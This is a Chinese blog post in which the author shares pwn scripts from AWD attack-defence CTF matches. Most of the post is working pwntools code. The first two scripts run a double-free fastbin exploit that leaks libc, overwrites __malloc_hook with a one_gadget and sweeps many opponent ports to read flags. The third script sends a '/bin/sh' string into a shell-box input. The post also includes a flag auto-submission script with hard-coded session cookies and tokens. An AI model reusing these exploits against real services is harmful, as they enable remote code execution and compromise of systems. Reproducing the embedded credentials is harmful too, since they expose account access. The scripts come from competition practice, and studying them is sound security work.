awd 通打pwn脚本记录一波

0x0 前言

第一次线上awd,交flag是交的真的爽,也算是对awd的流程有所熟悉了。题目不难,但是深感自己写脚本速度还是不够快。

0x1 第一题

漏洞是 double free，修补的时候直接把 free 函数去掉了。

import os
from pwn import *

def add(index, size, content):
    """Menu option 1: answer the index/size/name prompts, then wait for the menu.

    Uses the module-level pwntools tube ``sh``; ``content`` is sent as-is.
    """
    sh.sendline('1')
    for prompt, value in (('index>> ', index), ('size>> ', size)):
        sh.recvuntil(prompt)
        sh.sendline(str(value))
    sh.recvuntil('name>> ')
    sh.sendline(content)
    sh.recvuntil('Your Choice\n')
def delete(index):
    """Menu option 2: send *index* to the index prompt, then wait for the menu."""
    send = sh.sendline
    send('2')
    sh.recvuntil('index>> ')
    send(str(index))
    sh.recvuntil('Your Choice\n')

def edit(index, content):
    """Menu option 3: overwrite entry *index* with *content*.

    Unlike add/delete this does not wait for the next menu prompt afterwards.
    """
    for prompt, reply in (('index>> ', str(index)), ('name>> ', content)):
        if prompt == 'index>> ':
            sh.sendline('3')
        sh.recvuntil(prompt)
        sh.sendline(reply)

def show(index):
    """Menu option 5: select *index* and return the first 6 bytes the service prints."""
    sh.sendline('5')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    leaked = sh.recv(6)
    sh.recvuntil('Your Choice\n')
    return leaked

ip = "39.100.119.37"  # host used by the port sweep at the bottom of the script

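def get_shell(ip, port):
    """Connect to ip:port, replay the author's allocate/free sequence and return the tube.

    The add/delete/show helpers read the module-level ``sh``. Without
    ``global sh`` this function's ``sh`` was a local, so the first helper call
    raised NameError (which get_flag's generic handler then hid as 'Exception').
    """
    global sh
    sh = remote(ip, port)
    sh.recvuntil('Your Choice\n')
    add(0, 0x100, 'a')  # 0
    add(1, 0x60, 'b')   # 1
    add(9, 0x30, 'ss')
    delete(0)
    # show() returns 6 bytes; pad to a qword before decoding. The subtracted
    # constants are the author's hard-coded offsets for the remote libc.
    libc_base = u64(show(0).ljust(8, '\x00')) - 0x3c4b78
    log.success('libc_base = ' + hex(libc_base))
    one_gadget = libc_base + 0xf02a4
    malloc_hook = libc_base + 0x3c4b10
    fake_fast = malloc_hook - 0x13
    add(2, 0x60, 'c')
    add(3, 0x60, '3')

    delete(1)
    delete(2)
    delete(1)
    delete(9)
    add(4, 0x60, p64(fake_fast))
    add(5, 0x60, 'z')
    add(6, 0x60, 'ss')
    add(7, 0x60, 'a' * 0x3 + p64(one_gadget))

    # Final menu action; the menu prompt is deliberately not waited for here.
    sh.sendline('2')
    sh.recvuntil('index>> ')
    sh.sendline(str(1))

    return sh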

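def get_flag(ip, port):
    """Obtain a tube from get_shell, send ``cat flag`` and print the reply.

    The tube is closed on every path (the original leaked it on exceptions)
    and failures are reported with the real exception type and message
    instead of a bare class name.
    """
    r = None
    try:
        r = get_shell(ip, port)
        r.sendline("cat flag\n")
        print(r.recv(100))
    except Exception as e:
        # Single handler: the five original ones were all subclasses of Exception.
        print('%s: %s' % (type(e).__name__, e))
    finally:
        if r is not None:
            r.close()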

port = 41080  # first port of the sweep below; each later target is +100

# Twenty targets: port, port+100, ..., port+1900 on the fixed host.
for p in range(port, port + 20 * 100, 100):
    get_flag(ip, p)

0x2 第二题

还是 double free，修补时同样把 free 去掉了。

import os
from pwn import *

token = "7hQvn3AnHrtjaFmFN2MxztbCM4hGRQECZKEvJzu2dtSfU"  # NOTE(review): not used in this script; a hard-coded credential that should not live in source
url = "http://10.66.20.15/api/v1/jad/web/submit_flag/?event_id=2"  # submission endpoint; not referenced below

ips=[]  # port numbers as decimal strings, filled by the loop after the helpers

context.timeout = 1  # pwntools default timeout for the recv/send calls below

def add(index, size, content):
    """Menu option 1: create entry *index* with *size* bytes of *content* on ``sh``."""
    replies = [
        ('index>> ', str(index)),
        ('size>> ', str(size)),
        ('name>> ', content),
    ]
    sh.sendline('1')
    for prompt, reply in replies:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil('Your Choice\n')
def delete(index):
    """Menu option 2: remove entry *index*, then wait for the menu prompt."""
    sh.sendline('2')
    sh.recvuntil('index>> ')
    sh.sendline('%s' % str(index))
    sh.recvuntil('Your Choice\n')

def edit(index, content):
    """Menu option 3: replace entry *index* with *content*; does not wait for the menu."""
    sh.sendline('3')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('name>> ')
    sh.sendline(content)

def show(index):
    """Menu option 5: print entry *index* and return the first 6 bytes received."""
    sh.sendline('5')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    head = sh.recv(6)
    sh.recvuntil('Your Choice\n')
    return head
# Port strings "40580" .. "43180" (two-digit team number zero-padded in the middle).
for n in range(5, 32):
    ips.append("4%02d80" % n)
# print ips

def get_shell(ip):
    """Connect to the fixed host on port *ip* (a decimal string), replay the
    author's allocate/free sequence and return the live tube.

    Binds the module-level ``sh`` so the add/delete/show helpers can use it.
    """
    global sh

    sh = remote('39.100.119.37', int(ip, 10))
    sh.recvuntil('Your Choice\n')
    add(0, 0x100, 'a')  # 0
    add(1, 0x60, 'b')   # 1
    add(9, 0x30, 'ss')
    delete(0)
    # 6 leaked bytes zero-padded to a qword; the constants are the author's
    # hard-coded offsets for the remote libc.
    leak = show(0).ljust(8, '\x00')
    base = u64(leak) - 0x3c4b78
    log.success('libc_base = ' + hex(base))
    gadget = base + 0xf02a4
    hook = base + 0x3c4b10
    fake_chunk = hook - 0x13
    add(2, 0x60, 'c')
    add(3, 0x60, '3')

    for idx in (1, 2, 1, 9):
        delete(idx)
    add(4, 0x60, p64(fake_chunk))
    add(5, 0x60, 'z')
    add(6, 0x60, 'ss')
    add(7, 0x60, 'a' * 0x3 + p64(gadget))
    sh.sendline('2')
    sh.sendline('1')
    return sh

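def get_flag(ip):
    """Run get_shell on port *ip*, read whatever comes back and log it.

    The tube is always closed (the original leaked it whenever an exception
    fired) and errors are printed with type and message rather than a bare
    class name.
    """
    tube = None
    try:
        tube = get_shell(ip)
        tube.sendline('cat ?l?g')
        sleep(0.5)
        tube.sendline('cat flag')
        flag = tube.recvall(timeout=1)
        log.success(flag)
    except Exception as e:
        print('%s: %s' % (type(e).__name__, e))
    finally:
        if tube is not None:
            tube.close()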


# Sweep every port string collected in ips.
for target in ips:
    get_flag(target)

自动提交脚本

import json

import requests
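def tjflag1(flag):
    """POST *flag* as a JSON submission for challenge 2 and print the response body."""

    url = "http://39.100.119.37:8080/api/v1/challenges/attempt"
    # Serialize with json.dumps so a quote or backslash inside flag is escaped
    # instead of breaking the document (the original concatenated strings).
    data = json.dumps({"challenge_id": 2, "submission": flag})
    h = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "CSRF-Token": "e9817606c5e5373499bd7e43b64c045b60a276b839b340c4f4a37c2eb27f4e8a",
        "Connection": "keep-alive",
        "Content-Type": "application/json"
    }
    # NOTE(review): session cookie and CSRF token are hard-coded credentials;
    # load them from the environment or an untracked file before sharing this script.
    cookies = {"session": "2deefa03-cda6-41fc-be25-a986067c7048", "PHPSESSID": "jnr3quolg5o2ohlifbdld6bku5"}
    req = requests.post(url=url, data=data, cookies=cookies, headers=h)
    print(req.text)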

def ftjflag1():
    """Read ./web2.txt line by line, echo each stripped line and submit it with tjflag1."""
    with open("./web2.txt") as f:
        for raw in f:
            line = raw.strip()
            print(line)
            tjflag1(line)


ftjflag1()

整理flag的正则

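# Take the first flag{...} match out of data. The original indexed
# findall(...)[0], which raised IndexError whenever the text held no flag.
m = re.search(r'flag{[a-zA-Z0-9\-]*}', data)
if m:
    flag = m.group(0)
    flag_file.write(flag + "\n")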

0x3 第二次awd pwn1脚本

import os

from pwn import *



token = "7hQvn3AnHrtjaFmFN2MxztbCM4hGRQECZKEvJzu2dtSfU"  # NOTE(review): unused here; hard-coded credential that should not be in source

url = "http://10.66.20.15/api/v1/jad/web/submit_flag/?event_id=2"  # submission endpoint; not referenced below



ips=[]  # port numbers as decimal strings, filled by the loop after the helpers

context.timeout = 1  # pwntools default timeout for recv/send below





def add(size, content):
    """Menu option 1: store a secret of *size* bytes with body *content* on ``sh``."""
    exchanges = (
        ("choice:", '1'),
        ("How long is your secret?\n", str(size)),
        ("So,tell me your secret:\n", content),
    )
    for prompt, reply in exchanges:
        sh.recvuntil(prompt)
        sh.sendline(reply)



def delete(idx):
    """Menu option 2: drop the secret stored at *idx*."""
    steps = (
        ("choice:", '2'),
        ('Which secret do you want to drop off?', str(idx)),
    )
    for prompt, reply in steps:
        sh.recvuntil(prompt)
        sh.sendline(reply)



fo = open("foo.txt", "w")  # NOTE(review): opened at import time and never closed in this script; buffered output is only flushed at interpreter exit



# Port strings "10380" .. "12780" (two-digit team number zero-padded in the middle).
for n in range(3, 28):
    ips.append("1%02d80" % n)

# print ips



def get_shell(ip):
    """Connect to the fixed host on port *ip* (a decimal string), walk the
    author's input sequence and return the tube.

    Binds the module-level ``sh``; swap in ``process('./pwn')`` for a local run.
    """
    global sh

    sh = remote('39.100.119.37', int(ip, 10))
    sh.send('iwanaflag')
    print(sh.recv(timeout=0.5))
    filler = '\x00' * 0x40
    sh.sendline(filler)
    sh.recvuntil('4. exit')
    sh.sendline('4')
    sh.recvuntil('Here is shell box!\n')
    box_input = 'ls\x00,/bin/sh'
    sh.send(box_input)
    return sh



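def get_flag(ip):
    """Run get_shell on port *ip*, read the output and append it to ``fo``.

    The write is flushed immediately (``fo`` is never closed by the script,
    so buffered data would otherwise be lost if the run is interrupted), the
    tube is closed on every path, and errors are printed with type and
    message rather than a bare class name.
    """
    tube = None
    try:
        tube = get_shell(ip)
        tube.sendline('cat flag')
        flag = tube.recvall(timeout=0.2)
        fo.write(flag)
        fo.flush()
    except Exception as e:
        print('%s: %s' % (type(e).__name__, e))
    finally:
        if tube is not None:
            tube.close()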





# Sweep every port string collected in ips.
for target in ips:
    get_flag(target)

python经常碰到一些缩进问题的报错,很烦人
